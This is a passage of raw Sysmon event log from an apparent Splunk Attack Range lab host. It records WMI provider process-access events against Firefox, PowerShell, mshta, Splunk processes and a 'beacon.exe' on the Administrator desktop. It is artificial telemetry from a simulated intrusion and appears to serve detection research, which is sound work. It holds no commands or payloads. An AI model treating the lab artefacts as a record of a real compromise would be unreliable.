indows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697366Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697365Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.240{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697364Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.240{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697363Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.240{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697362Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.240{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7957-6039-1D10-00000000AD01}2836C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697361Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.240{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697360Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.240{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697359Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.240{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697358Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.240{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000001697357Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.240{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F18EB844A25B34493329A05060063DA4,SHA256=829188E161278695054EA700C82F79C586D8C52756648034D57A2348EA1D630F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697356Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.240{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697355Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.240{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697354Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.240{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697353Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.240{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697352Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.240{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697351Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.240{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697350Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.240{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697349Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.240{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697348Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.240{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697347Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.240{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697346Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 